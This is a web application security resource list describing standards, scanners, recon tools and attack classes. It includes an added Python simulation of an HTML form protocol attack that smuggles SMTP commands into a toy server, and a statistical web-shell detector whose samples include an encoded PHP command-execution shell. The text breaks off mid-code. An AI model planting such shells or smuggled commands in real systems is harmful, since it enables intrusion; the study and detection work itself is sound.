cranelab / webapp-tech

Web Application Technologies

Table of Contents


  • 101 ASVS
    • OWASP Top Ten Project
      • The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list.
    • The Website Obesity Crisis
    • Video Testing stateful web application workflows - András Veres-Szentkirályi
    • Paper Testing stateful web application workflows - SANS - András Veres-Szentkirályi
      • Most web applications used for complex business operations and/or employing advanced GUI frameworks have stateful functionality. Certain workflows, for example, might require completing certain steps before a transaction is committed, or a request sent by a client-side UI element might need several preceding requests that all contribute to the session state. Most automated tools focus on a request and maybe a redirection, thus completely missing the point in these cases, where resending a request gets ignored by the target application. As a result, while these tools are getting better day by day, using them for testing such execution paths is usually out of the question. Since thorough assessment is cumbersome without such tools, there's progress, but we are far from plug-and-play products. This paper focuses on the capabilities of currently available solutions, demonstrating their pros and cons, along with opportunities for improvement.

Standards


Content Security Policy (CSP)


Cross-Origin Resource Sharing (CORS)


Document Object Model (DOM)

Hyper Text Markup Language HTML


Fetch


Hyper Text Transport Protocol (HTTP)


MIME Sniffing

  • 101
    • MIME Sniffing - whatwg.org
    • Media Type Sniffing | draft-ietf-websec-mime-sniff-03
      • Many web servers supply incorrect Content-Type header fields with their HTTP responses. In order to be compatible with these servers, user agents consider the content of HTTP responses as well as the Content-Type header fields when determining the effective media type of the response. This document describes an algorithm for determining the effective media type of HTTP responses that balances security and compatibility considerations.
  • Articles/Blogposts/Presentations/Talks/Writeups

OAUTH


robots.txt


Same-Origin Policy


Security Assertion Markup Language (SAML)


Service Workers

  • 101
    • Service Worker - w3c
      • This specification describes a method that enables applications to take advantage of persistent background processing, including hooks to enable bootstrapping of web applications while offline. The core of this system is an event-driven Web Worker, which responds to events dispatched from documents and other sources. A system for managing installation, versions, and upgrades is provided. The service worker is a generic entry point for event-driven background processing in the Web Platform that is extensible by other specifications.

Subresource Integrity


Secure Sockets Layer/Transport Layer Security (SSL/TLS)

  • 101
  • Articles/Blogposts/Presentations/Talks/Writeups
  • Attacks Against
    • SSL/TLS Interception Proxies and Transitive Trust
      • Secure Sockets Layer (SSL) and its successor Transport Layer Security (TLS) have become key components of the modern Internet. The privacy, integrity, and authenticity provided by these protocols are critical to allowing sensitive communications to occur. Without these systems, e-commerce, online banking, and business-to-business exchange of information would likely be far less frequent. Threat actors have also recognized the benefits of transport security, and they are increasingly turning to SSL to hide their activities. Advanced Persistent Threat (APT) attackers, botnets, and even commodity web attacks can leverage SSL encryption to evade detection. To counter these tactics, organizations are increasingly deploying security controls that intercept end-to-end encrypted channels. Web proxies, data loss prevention (DLP) systems, specialized threat detection solutions, and network intrusion prevention systems (NIPS) offer functionality to intercept, inspect, and filter encrypted traffic. Similar functionality is present in lawful intercept systems and solutions enabling the broad surveillance of encrypted communications by governments. Broadly classified as "SSL/TLS interception proxies", these solutions act as a "man-in-the-middle", violating the end-to-end security promises of SSL. This type of interception comes at a cost. Intercepting SSL-encrypted connections sacrifices a degree of privacy and integrity for the benefit of content inspection, often at the risk of authenticity and endpoint validation. Implementers and designers of SSL interception proxies should consider these risks and understand how their systems operate in unusual circumstances.

Streams

  • 101
    • Streams - Dec12 2019
      • This specification provides APIs for creating, composing, and consuming streams of data that map efficiently to low-level I/O primitives.

Uniform Resource Identifier/Locator (URIs/URLs)


Web Authentication


WebBluetooth


Web Hooks


WebNFC


WebRTC


WebSockets


WebUSB

  • 101
  • Articles/Blogposts/Presentations/Talks/Writeups
    • WebUSB - How a website could steal data off your phone
      • This blog post looks into the capabilities of WebUSB to understand how it works, the new attack surface, and privacy issues. We will describe the processes necessary to get access to devices and how permissions are handled in the browser. Then we will discuss some security implications and show how a website can use WebUSB to establish an ADB connection and effectively compromise a connected Android phone.


API Stuff

  • General
    • WebSocket API Standards
    • White House Web API Standards
      • This document provides guidelines and examples for White House Web APIs, encouraging consistency, maintainability, and best practices across applications. White House APIs aim to balance a truly RESTful API interface with a positive developer experience (DX).
    • Build Simple Restful Api With Python and Flask Part 1 - Mukhammad Ginanjar Azie
    • What Is OpenAPI?
    • The OpenAPI Specification
      • The OpenAPI Specification (OAS) defines a standard, programming language-agnostic interface description for REST APIs, which allows both humans and computers to discover and understand the capabilities of a service without requiring access to source code, additional documentation, or inspection of network traffic. When properly defined via OpenAPI, a consumer can understand and interact with the remote service with a minimal amount of implementation logic. Similar to what interface descriptions have done for lower-level programming, the OpenAPI Specification removes guesswork in calling a service.
    • The OpenAPI Specification
      • The OpenAPI Specification is a community-driven open specification within the OpenAPI Initiative, a Linux Foundation Collaborative Project. The OpenAPI Specification (OAS) defines a standard, programming language-agnostic interface description for REST APIs, which allows both humans and computers to discover and understand the capabilities of a service without requiring access to source code, additional documentation, or inspection of network traffic. When properly defined via OpenAPI, a consumer can understand and interact with the remote service with a minimal amount of implementation logic. Similar to what interface descriptions have done for lower-level programming, the OpenAPI Specification removes guesswork in calling a service.
  • Fuzzing
  • Building One
  • Securing
  • Tools
    • Postman - chrome plugin
    • restclient - Firefox addon
    • Astra
      • REST API penetration testing is complex due to continuous changes in existing APIs and newly added APIs. Astra can be used by security engineers or developers as an integral part of their process, so they can detect and patch vulnerabilities early during the development cycle. Astra can automatically detect and test login & logout (Authentication API), so it's easy for anyone to integrate this into a CI/CD pipeline. Astra can take an API collection as input, so it can also be used for testing APIs in standalone mode.
    • API-fuzzer
      • API fuzzer which allows fuzzing of request attributes using common pentesting techniques and lists vulnerabilities


  • General
    • Abusing Certificate Transparency Or How To Hack Web Applications Before Installation - Hanno Böck
    • The Spy in the Sandbox – Practical Cache Attacks in Javascript
      • We present the first micro-architectural side-channel attack which runs entirely in the browser. In contrast to other works in this genre, this attack does not require the attacker to install any software on the victim's machine to facilitate the attack; the victim needs only to browse to an untrusted webpage with attacker-controlled content. This makes the attack model highly scalable and extremely relevant and practical to today's web, especially since most desktop browsers currently accessing the Internet are vulnerable to this attack. Our attack, which is an extension of the last-level cache attacks of Yarom et al., allows a remote adversary to recover information belonging to other processes, other users and even other virtual machines running on the same physical host as the victim web browser. We describe the fundamentals behind our attack, evaluate its performance using a high bandwidth covert channel and finally use it to construct a system-wide mouse/network activity logger. Defending against this attack is possible, but the required countermeasures can exact an impractical cost on other benign uses of the web browser and of the computer.
  • Tools

  • Drupal
  • Joomla
    • Highly Effective Joomla Backdoor with Small Profile
    • JoomScan
      • Joomla! is probably the most widely-used CMS out there due to its flexibility, user-friendliness, and extensibility, to name a few. So, watching its vulnerabilities and adding them as KB entries to the Joomla scanner is an ongoing activity. It will help web developers and web masters identify possible security weaknesses on their deployed Joomla! sites. No other web security scanner is dedicated to only one CMS.
    • JScanner
      • Analyze target Joomla! installation using several different techniques.
    • JoomlaVS
      • JoomlaVS is a Ruby application that can help automate assessing how vulnerable a Joomla installation is to exploitation. It supports basic fingerprinting and can scan for vulnerabilities in components, modules and templates as well as vulnerabilities that exist within Joomla itself.
  • Sharepoint
    • Sparty - Sharepoint/Frontpage Auditing Tool
      • Sparty is an open source tool written in Python to audit web applications using SharePoint and FrontPage architecture. The motivation behind this tool is to provide an easy and robust way to scrutinize the security configurations of SharePoint and FrontPage based web applications. Due to the complex nature of this web administration software, a simple and efficient tool is needed that gathers information, checks access permissions, dumps critical information from default files and performs automated exploitation if security risks are identified. A number of automated scanners fall short of this, and Sparty is a solution to that.
  • Wordpress
    • WPScan
      • WPScan is a black box WordPress vulnerability scanner.
    • WPSeku
      • Wordpress Security Scanner

Continuous Integration/Delivery/Build Systems


ColdFusion


Electron


Flash/SWF



Java Server Faces (JSF)


Java Server Pages (JSP)


JSON Web Tokens



NodeJS


Platform Agnostic Security Token (PASETO)


PHP


REST/SOAP/Web Services (WSDL)


Ruby/Ruby on Rails


Web Assembly


Secure Sockets Layer / Transport Layer Security


  • 101
  • Articles/Blogposts/Writeups
  • Talks & Presentations
  • Dupe Key Confusion
    • An attack to bypass XML signature verification by sending multiple key identifiers in the KeyInfo section. Vulnerable systems will use the first one to verify the XML signature and the second one to verify the trust on the signing party. This plugin applies this technique to SAML tokens by allowing the user to modify and then re-sign the SAML assertion with an arbitrary attacker-controlled key, which is then sent as the first element of the KeyInfo section, while the original key identifier is sent as the second key identifier.
    • Tools
      • DupeKeyInjector
        • Dupe Key Injector is a Burp Suite extension implementing Dupe Key Confusion, a new XML signature bypass technique presented at the BSides/BlackHat/DEFCON 2019 "SSO Wars: The Token Menace" presentation.
        • Slides
        • Paper


JS Frameworks


  • 101
  • Articles/Blogposts/Writeups
  • Tools
    • Burpsuite
      • Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.
    • ZAP - Zed Attack Proxy
      • The Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing. ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.
    • Paros - Web Proxy
      • A Java based HTTP/HTTPS proxy for assessing web application vulnerability. It supports editing/viewing HTTP messages on-the-fly. Other features include spiders, client certificate, proxy-chaining, intelligent scanning for XSS and SQL injections etc.
    • Mallory: Transparent TCP and UDP Proxy
      • Mallory is a transparent TCP and UDP proxy. It can be used to get at those hard to intercept network streams, assess those tricky mobile web applications, or maybe just pull a prank on your friend.
    • TCP Catcher
      • TcpCatcher is a free TCP, SOCKS, HTTP and HTTPS proxy monitor server software.
    • wssip
      • Application for capturing, modifying and sending custom WebSocket data from client to server and vice versa.
    • ratproxy
      • Ratproxy is a semi-automated, largely passive web application security audit tool. It is meant to complement active crawlers and manual proxies more commonly used for this task, and is optimized specifically for an accurate and sensitive detection, and automatic annotation, of potential problems and security-relevant design patterns based on the observation of existing, user-initiated traffic in complex web 2.0 environments.


  • Attacking
  • Securing
  • Guides & Methodologies
  • Payloads
  • Tactics
  • General Reconnaissance Techniques
    • Insecure HTTP Header Removal
    • Backslash Powered Scanning: Hunting Unknown Vulnerability Classes
      • Existing web scanners search for server-side injection vulnerabilities by throwing a canned list of technology-specific payloads at a target and looking for signatures - almost like an anti-virus. In this document, I'll share the conception and development of an alternative approach, capable of finding and confirming both known and unknown classes of injection vulnerabilities. Evolved from classic manual techniques, this approach reaps many of the benefits of manual testing including casual WAF evasion, a tiny network footprint, and flexibility in the face of input filtering.
  • Attack Surface Reconnaissance
    • Articles/Blogposts/Writeups
    • Tools
      • AttackSurfaceMapper
        • Attack Surface Mapper is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target. You feed in a mixture of one or more domains, subdomains and IP addresses and it uses numerous techniques to find more targets. It enumerates subdomains with bruteforcing and passive lookups, other IPs of the same network block owner, IPs that have multiple domain names pointing to them and so on. Once the target list is fully expanded it performs passive reconnaissance on them, taking screenshots of websites, generating visual maps, looking up credentials in public breaches, passive port scanning with Shodan and scraping employees from LinkedIn.
      • intrigue-core
        • Intrigue-core is a framework for external attack surface discovery and automated OSINT.
      • Domain Analyzer
        • Domain analyzer is a security analysis tool which automatically discovers and reports information about the given domain. Its main purpose is to analyze domains in an unattended way.
      • domain-profiler
        • domain-profiler is a tool that uses information from various sources (Whois, DNS, SSL, ASN) to determine what decisions have been made regarding a domain or list of domains.
      • The Hamburglar
        • Hamburglar -- collect useful information from urls, directories, and files
  • (Sub)Domain Reconnaissance
    • Articles/Blogposts/Writeups
    • Domain Discovery
      • DRROBOT
        • Dr.ROBOT is a tool for Domain Reconnaissance and Enumeration. By utilizing containers to reduce the overhead of dealing with dependencies, inconsistencies across operating systems, and different languages, Dr.ROBOT is built to be highly portable and configurable.
    • Subdomain Discovery Tools
      • Sudomy
        • Sudomy is a subdomain enumeration tool, created using a bash script, to analyze domains and collect subdomains in a fast and comprehensive way.
      • domains-from-csp
        • A Python script to parse domain names from a CSP header
      • pdlist. A passive subdomain finder
        • pdlist is a passive subdomain finder written in python3. This tool can be used effectively to collect information about a domain without ever sending a single packet to any of its hosts. Given a domain like "example.com" it will find all the hosts which have a hostname <something>.example.com or URLs strictly related to example.com.
  • Subdomain Takeover
  • Virtual Hosts
    • 101
    • Tools
      • virtual-host-discovery
        • This is a basic HTTP scanner that'll enumerate virtual hosts on a given IP address. During recon, this might help expand the target by detecting old or deprecated code. It may also reveal hidden hosts that are statically mapped in the developer's /etc/hosts file.
      • blacksheepwall
        • blacksheepwall is a hostname reconnaissance tool
      • VHostScan
        • A virtual host scanner that performs reverse lookups, can be used with pivot tools, detect catch-all scenarios, work around wildcards, aliases and dynamic default pages.
  • Visual Reconnaissance
    • Articles/Blogposts/Writeups
    • Tools
      • PowerWebShot
        • A PowerShell tool for taking screenshots of multiple web servers quickly.
      • HTTrack - Website Copier
        • It allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer. HTTrack arranges the original site's relative link-structure. Simply open a page of the "mirrored" website in your browser, and you can browse the site from link to link, as if you were viewing it online. HTTrack can also update an existing mirrored site, and resume interrupted downloads. HTTrack is fully configurable, and has an integrated help system.
      • Kraken
        • Kraken is a tool to help make your web interface testing workflow more efficient. This is done by using Django, Apache, and a MySQL database to store and organize web interface screenshots and data. This allows you and your team to take notes and track which hosts have been tested simultaneously. Once you are finished, you can view these notes you took and generate reports in the Reports section.
      • Eyeballer
        • Eyeballer is meant for large-scope network penetration tests where you need to find "interesting" targets from a huge set of web-based hosts. Go ahead and use your favorite screenshotting tool like normal (EyeWitness or GoWitness) and then run them through Eyeballer to tell you what's likely to contain vulnerabilities, and what isn't.
      • gowitness
        • gowitness is a website screenshot utility written in Golang that uses Chrome Headless to generate screenshots of web interfaces using the command line. Both Linux and macOS are supported, with Windows support 'partially working'.
      • webscreenshot
        • A simple script to screenshot a list of websites, based on the url-to-image PhantomJS script.
      • LazyShot
        • The simplest way to take an automated screenshot of given URLs. Easy installation!
      • RAWR - Rapid Assessment of Web Resources
    • 3rd Party Hosted Tools
      • VisualSiteMapper
        • Visual Site Mapper is a free service that can quickly show a map of your site.
  • Recon
    • HTTPLeaks
      • HTTPLeaks - All possible ways, a website can leak HTTP requests
    • General
      • hackability
        • Rendering Engine Hackability Probe performs a variety of tests to discover what the unknown rendering engine supports. To use it simply extract it to your web server and visit the url in the rendering engine you want to test. The more successful probes you get the more likely the target engine is vulnerable to attack.
    • Content/Folder Discovery
      • Tachyon
        • Tachyon is a Fast Multi-Threaded Web Discovery Tool
      • dirsearch
        • dirsearch is a simple command line tool designed to brute force directories and files in websites.
      • LinkFinder
        • LinkFinder is a Python script written to discover endpoints and their parameters in JavaScript files. This way penetration testers and bug hunters are able to gather new, hidden endpoints on the websites they are testing, resulting in new testing ground possibly containing new vulnerabilities. It does so by using jsbeautifier for Python in combination with a fairly large regular expression.
    • JS-based scanning
      • lan-js
        • Probe LAN devices from a web browser.
      • sonar.js
        • A Framework for Scanning and Exploiting Internal Hosts With a Webpage
    • Web Page
      • HTCAP
        • htcap is a web application scanner able to crawl single page application (SPA) in a recursive manner by intercepting ajax calls and DOM changes
      • gethead
        • HTTP Header Analysis Vulnerability Tool
    • Web Server
      • WhatWeb
      • httprecon - Advanced Web Server Fingerprinting
        • The httprecon project is doing some research in the field of web server fingerprinting, also known as HTTP fingerprinting. The goal is the highly accurate identification of given httpd implementations. This is very important within professional vulnerability analysis. Besides the discussion of different approaches and the documentation of gathered results, an implementation for automated analysis is also provided. This software shall improve the ease and efficiency of this kind of enumeration. Traditional approaches such as banner-grabbing, status code enumeration and header ordering analysis are used. However, many other analysis techniques were introduced to increase the possibilities of accurate web server fingerprinting. Some of them were already discussed in the book Die Kunst des Penetration Testing (Chapter 9.3, HTTP-Fingerprinting, pp. 530-550).
  • HTTP Enumeration
    • Articles/Blogposts/Writeups
    • Tools
      • Arjun
        • HTTP parameter discovery suite.
      • Psi-Probe
        • Advanced manager and monitor for Apache Tomcat, forked from Lambda Probe
      • HTTPie - curl for humans
        • HTTPie (pronounced aych-tee-tee-pie) is a command line HTTP client. Its goal is to make CLI interaction with web services as human-friendly as possible. It provides a simple http command that allows for sending arbitrary HTTP requests using a simple and natural syntax, and displays colorized output. HTTPie can be used for testing, debugging, and generally interacting with HTTP servers.
  • Endpoint Discovery
    • Articles/Blogposts/Writeups
    • Tools
      • LinkFinder
        • A python script that finds endpoints in JavaScript files
      • JSParser
        • A Python 2.7 script using Tornado and JSBeautifier to parse relative URLs from JavaScript files. Useful for easily discovering AJAX requests when performing security research or bug bounty hunting.
  • Forced-Browsing
  • Site/Technology Identification
    • WhatWeb
      • WhatWeb identifies websites. Its goal is to answer the question, "What is that Website?". WhatWeb recognises web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. WhatWeb has over 1500 plugins, each to recognise something different. WhatWeb also identifies version numbers, email addresses, account IDs, web framework modules, SQL errors, and more.
    • CMSExplorer
      • CMS Explorer is designed to reveal the specific modules, plugins, components and themes that various CMS driven web sites are running. Additionally, CMS Explorer can be used to aid in security testing. While it performs no direct security checks, the "explore" option can be used to reveal hidden/library files which are not typically accessed by web clients but are nonetheless accessible. This is done by retrieving the module's current source tree and then requesting those file names from the target system. These requests can be sent through a distinct proxy to help "bootstrap" security testing tools like Burp, Paros, Webinspect, etc.
    • BlindElephant Web Application Fingerprinter
      • The BlindElephant Web Application Fingerprinter attempts to discover the version of a (known) web application by comparing static files at known locations against precomputed hashes for versions of those files in all available releases. The technique is fast, low-bandwidth, non-invasive, generic, and highly automatable.
    • Fingerprinter
      • CMS/LMS/Library etc Versions Fingerprinter. This script's goal is to try to find the version of the remote application/third party script etc by using a fingerprinting approach.
    • Web Filter External Enumeration Tool (WebFEET)
      • WebFEET is a web application for the drive-by enumeration of web security proxies and policies. See associated white paper (Drive-by enumeration of web filtering solutions)
    • Fingerprinter
      • This script's goal is to try to find the version of the remote application/third party script etc. by using a fingerprinting approach.
  • Vulnerability Scanner
    • Nikto
    • Spaghetti - Web Application Security Scanner
      • Spaghetti is an Open Source web application scanner; it is designed to find various default and insecure files, configurations, and misconfigurations. Spaghetti is built on Python 2.7 and can run on any platform which has a Python environment.
    • skipfish
      • Skipfish is an active web application security reconnaissance tool. It prepares an interactive sitemap for the targeted site by carrying out a recursive crawl and dictionary-based probes. The resulting map is then annotated with the output from a number of active (but hopefully non-disruptive) security checks. The final report generated by the tool is meant to serve as a foundation for professional web application security assessments.
    • wikto
      • Wikto is Nikto for Windows - but with a couple of fancy extra features including Fuzzy logic error code checking, a back-end miner, Google assisted directory mining and real time HTTP request/response monitoring. Wikto is coded in C# and requires the .NET framework.
    • WATOBO
      • WATOBO is a security tool for testing web applications. It is intended to enable security professionals to perform efficient (semi-automated) web application security audits.
    • YASUO
      • Yasuo is a ruby script that scans for vulnerable 3rd-party web applications.
    • ParrotNG
      • ParrotNG is a tool capable of identifying Adobe Flex applications (SWF) vulnerable to CVE-2011-2461
    • Arachni Web Scanner
      • Arachni is an Open Source, feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications. It is smart, it trains itself by monitoring and learning from the web application's behavior during the scan process and is able to perform meta-analysis using a number of factors in order to correctly assess the trustworthiness of results and intelligently identify (or avoid) false-positives.
    • Pyfiscan
      • Pyfiscan is a free web-application vulnerability and version scanner and can be used to locate out-dated versions of common web applications on Linux servers. An example use case is hosting providers keeping an eye on their users' installations to keep up with security updates. Fingerprints are easy to create and modify, as the user can write them in YAML syntax. Pyfiscan also contains a tool to create email alerts using templates.
  • autochrome
    • This tool downloads, installs, and configures a shiny new copy of Chromium.
    • Article

Different Types of Attacks


Abuse of Functionality

  • jsgifkeylogger
    • A JavaScript keylogger embedded in a GIF file. This is a PoC.

  • Dirbuster
    • DirBuster is a multi-threaded Java application designed to brute force directory and file names on web/application servers. Often what looks like a web server in a default-installation state is actually not, and has pages and applications hidden within. DirBuster attempts to find these.
  • Go Buster
    • Directory/file busting tool written in Go
    • Recursive, CLI-based, no java runtime
  • WFuzz
    • Wfuzz is a tool designed for bruteforcing web applications. It can be used for finding resources not linked (directories, servlets, scripts, etc.), bruteforcing GET and POST parameters to check for different kinds of injections (SQL, XSS, LDAP, etc.), bruteforcing form parameters (User/Password), fuzzing, etc.
  • dirsearch
    • dirsearch is a simple command line tool designed to brute force directories and files in websites.
  • Tachyon
    • Tachyon is a Fast Multi-Threaded Web Discovery Tool
  • Syntribos
    • Given a simple configuration file and an example HTTP request, syntribos can replace any API URL, URL parameter, HTTP header and request body field with a given set of strings. Syntribos iterates through each position in the request automatically. Syntribos aims to automatically detect common security defects such as SQL injection, LDAP injection, buffer overflow, etc. In addition, syntribos can be used to help identify new security defects by automated fuzzing.

Attacking Continuous Integration Systems

  • cider - Continuous Integration and Deployment Exploiter
    • CIDER is a framework written in Node.js that aims to harness the functions necessary for exploiting Continuous Integration (CI) systems and their related infrastructure and build chain (e.g. Travis-CI, Drone, Circle-CI). Most of the exploits in CIDER exploit CI build systems through open GitHub repositories via malicious Pull Requests. It is built modularly to encourage contributions, so more exploits, attack surfaces, and build chain services will be integrated in the future.
  • Rotten Apple
    • A tool for testing continuous integration (CI) or continuous delivery (CD) system security
  • Exploiting Continuous Integration (CI) and Automated Build Systems - spaceb0x

CSV Injection


Clickjacking


Cross Protocol Scripting/Request Attack

  • 101
  • Articles/Blogposts/Writeups
  • Papers
    • HTML Form Protocol Attack - Jochen Topf(2001)
      • This paper describes how some HTML browsers can be tricked through the use of HTML forms into sending more or less arbitrary data to any TCP port. This can be used to send commands to servers using ASCII based protocols like SMTP, NNTP, POP3, IMAP, IRC, and others. By sending HTML email to unsuspecting users or using a trojan HTML page, an attacker might be able to send mail or post Usenet News through servers normally not accessible to him. In special cases an attacker might be able to do other harm, e.g. deleting mail from a POP3 mailbox.
  • Presentations/Talks/Videos
  • Tools
    • Extract data
      • Extract data is a demo combining a cross-protocol request attack with DNS rebinding
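The mechanism in Topf's paper is easy to see in code: a form with `enctype="text/plain"` puts field values into the request body verbatim, so a value containing CRLFs turns into extra lines, and a line-oriented server that answers unknown commands with a 500 and carries on will treat the HTTP header block as garbage and then execute the smuggled commands. The following is an added example, not code from the paper or from the Extract data demo: it builds the request a browser would emit for such a form and feeds it to a constructed toy SMTP server. The hostnames and addresses are made up. The caveat a practitioner needs is also included: browsers now refuse to connect to the ports these protocols live on (the Fetch standard's "bad port" list, of which a partial copy is below), so the attack only works against ASCII protocols on ports that are not blocked.

```python
"""Added example: HTML form protocol attack against a constructed SMTP server."""

# Partial copy of the Fetch standard's bad-port list; browsers refuse HTTP(S)
# requests to these, which is why the 2001 attack no longer reaches SMTP/IMAP.
BAD_PORTS = {21, 22, 23, 25, 110, 119, 143, 465, 587, 993, 995, 6667}


def is_bad_port(port):
    return port in BAD_PORTS


def browser_text_plain_post(host, port, fields):
    """Request a browser builds for <form method=POST enctype="text/plain">:
    one 'name=value' line per field, CRLF terminated, values not escaped."""
    body = "".join(f"{name}={value}\r\n" for name, value in fields)
    return (
        f"POST / HTTP/1.1\r\nHost: {host}:{port}\r\n"
        "Content-Type: text/plain\r\n"
        f"Content-Length: {len(body.encode())}\r\n\r\n" + body
    )


def toy_smtp(lines):
    """Constructed line-oriented SMTP server. Like many real servers it replies
    500 to anything it does not understand and keeps reading, which is the
    property the attack depends on. Returns (delivered messages, reply log)."""
    replies, messages, data = [], [], []
    sender, rcpts, in_data = None, [], False
    for line in lines:
        if in_data:
            if line == ".":
                messages.append((sender, list(rcpts), "\n".join(data)))
                sender, rcpts, data, in_data = None, [], [], False
                replies.append("250 queued")
            else:
                data.append(line)
            continue
        verb = line.split(" ", 1)[0].upper()
        if verb == "HELO":
            replies.append("250 hello")
        elif verb == "MAIL":
            sender = line.split(":", 1)[1].strip()
            replies.append("250 sender ok")
        elif verb == "RCPT":
            rcpts.append(line.split(":", 1)[1].strip())
            replies.append("250 recipient ok")
        elif verb == "DATA":
            in_data = True
            replies.append("354 end with <CRLF>.<CRLF>")
        elif verb == "QUIT":
            replies.append("221 bye")
            break
        else:
            replies.append("500 command unrecognized: " + line[:20])
    return messages, replies


def demo():
    """A textarea value that smuggles a complete SMTP dialogue after the
    HTTP header block. Returns (raw request, delivered messages, replies)."""
    payload = ("\r\nHELO attacker.invalid\r\n"
               "MAIL FROM:<attacker@attacker.invalid>\r\n"
               "RCPT TO:<victim@internal.invalid>\r\n"
               "DATA\r\nSubject: hello\r\n\r\nsent through your browser\r\n.\r\nQUIT")
    raw = browser_text_plain_post("mail.internal.invalid", 25, [("comment", payload)])
    messages, replies = toy_smtp(raw.split("\r\n"))
    return raw, messages, replies


if __name__ == "__main__":
    raw, messages, replies = demo()
    print(raw)
    for reply in replies:
        print("S:", reply)
    print("delivered:", messages)
```

The six 500 replies cover the request line, three headers, the blank line and the `comment=` prefix; everything after that is accepted as SMTP. The same pattern (lenient ASCII protocol plus a browser that can be made to open a raw socket-like connection) is what the Extract data demo combines with DNS rebinding, and it is why servers such as modern SMTP daemons drop the connection after a few unrecognized commands instead of tolerating them.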

Cross Site Content Hijacking


Cross Site History Manipulation

  • 101
  • Articles/Blogposts/Writeups
  • Papers
  • Presentations/Talks/Videos
  • Tools

Cross Site Request Forgery (CSRF)


Cascading StyleSheets Injection


Cross Site WebSocket Hijacking




  • 101
  • Articles/Blogposts/Writeups
  • Papers
  • Presentations/Talks/Videos
  • Tools

  • 101
  • Articles/Blogposts/Writeups
  • Papers
  • Presentations/Talks/Videos
  • Tools



File Upload Testing





OS Command Injection


JNDI Attack Class





(No)SQL Injection



Prototype Pollution Attack


Reflected File Download


Relative Path Overwrite


Server Side Request Forgery (SSRF)


Server Side Include



Typosquatting


Web Shells

  • Articles
  • Detection
    • Case Study: How Backdoors Bypass Security Solutions with Advanced Camouflage Techniques
      • Look at PHP obfuscation methods for webshells
    • NeoPI
      • What is NeoPI? NeoPI is a Python script that uses a variety of statistical methods to detect obfuscated and encrypted content within text/script files. The intended purpose of NeoPI is to aid in the detection of hidden web shell code. The development focus of NeoPI was creating a tool that could be used in conjunction with other established detection methods such as Linux Malware Detect or traditional signature/keyword based searches.
    • Shell Detector
      • Shell Detector is an application that helps you find and identify PHP/CGI (Perl)/ASP/ASPX shells. It ships with a "web shells" signature database that, according to its author, identifies web shells with up to 99% accuracy.
    • Loki - Simple IOC Scanner
      • Scanner for Simple Indicators of Compromise
  • Tools
    • Weevely
      • Weevely is a command-line web shell dynamically extended over the network at runtime, used for remote administration and pen testing. It provides a weaponized telnet-like console through a PHP script running on the target, even in restricted environments. The low-footprint agent and over 30 modules form an extensible framework to administer, conduct a pen-test, post-exploit, and audit remote web access in order to escalate privileges and pivot deeper into internal networks.
      • Getting Started
    • b374k shell 3.2
      • This PHP shell is a useful tool for a system or web administrator to do remote management without using cPanel or connecting over SSH, FTP, etc. All actions take place within a web browser.
    • Simple websockets based webshell
    • JSShell
      • An interactive multi-user web-based JS shell written in Python with Flask (server side) and, of course, JavaScript and HTML (client side). It was initially created to debug remote esoteric browsers during tests and research. I'm aware of other purposes this tool might serve; use it at your own responsibility and risk.
    • htshells
      • Self contained web shells and other attacks via .htaccess files.
    • Encoding Web Shells in PNG IDAT chunks - idontplaydarts.com
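The statistical tests NeoPI describes are worth seeing in code, because they are what catches the shells that signature databases such as Shell Detector's miss: a freshly re-encoded `eval(base64_decode(...))` has no known signature but does have high entropy, a very long "word" and a flat letter distribution. The following is an added example, not NeoPI's code. It computes Shannon entropy, longest word and index of coincidence, adds a keyword hit count, ranks every file on each test and sums the ranks, with the lowest sum being the most suspicious. The sample files are constructed here; a real run would walk the webroot.

```python
"""Added example: NeoPI-style statistical ranking of files for hidden web shells.
The SAMPLES dict is constructed for the example; nothing here is a real site."""
import base64
import math
import re
from collections import Counter

# Functions that appear in most PHP shells; hits are counted, not treated as proof.
SUSPICIOUS = re.compile(
    r"\b(eval|assert|base64_decode|gzinflate|gzuncompress|str_rot13|"
    r"preg_replace|create_function|passthru|shell_exec|system|exec|popen)\s*\(", re.I)


def shannon_entropy(text):
    """Bits per character; packed or encoded payloads sit well above plain code."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def longest_word(text):
    """Longest whitespace-delimited token; base64 blobs make very long 'words'."""
    return max((len(w) for w in text.split()), default=0)


def index_of_coincidence(text):
    """Probability that two random letters match: near-uniform letter use
    (encoded data) scores low, natural text and ordinary code score higher."""
    letters = [c for c in text.lower() if c.isalpha()]
    n = len(letters)
    if n < 2:
        return 0.0
    return sum(c * (c - 1) for c in Counter(letters).values()) / (n * (n - 1))


def keyword_hits(text):
    return len(SUSPICIOUS.findall(text))


TESTS = [  # (name, function, higher value is more suspicious)
    ("entropy", shannon_entropy, True),
    ("longest_word", longest_word, True),
    ("ic", index_of_coincidence, False),
    ("keywords", keyword_hits, True),
]


def rank_files(files):
    """files: {name: contents}. Returns [(name, rank_sum, metrics)], most
    suspicious first: each test ranks every file, and the ranks are summed."""
    metrics = {name: {t: fn(body) for t, fn, _ in TESTS} for name, body in files.items()}
    rank_sum = {name: 0 for name in files}
    for t, _, higher_bad in TESTS:
        ordered = sorted(files, key=lambda n: metrics[n][t], reverse=higher_bad)
        for rank, name in enumerate(ordered):
            rank_sum[name] += rank
    return sorted(((n, rank_sum[n], metrics[n]) for n in files), key=lambda x: (x[1], x[0]))


# Constructed samples: two ordinary PHP files and one obfuscated one-liner shell.
_blob = base64.b64encode(b"<?php if(isset($_POST['c'])){system($_POST['c']);} ?>" * 3).decode()
SAMPLES = {
    "config.php": "<?php\n$db_host = 'localhost';\n$db_user = 'app';\n$db_pass = 'changeme';\n"
                  "define('DEBUG', false);\n",
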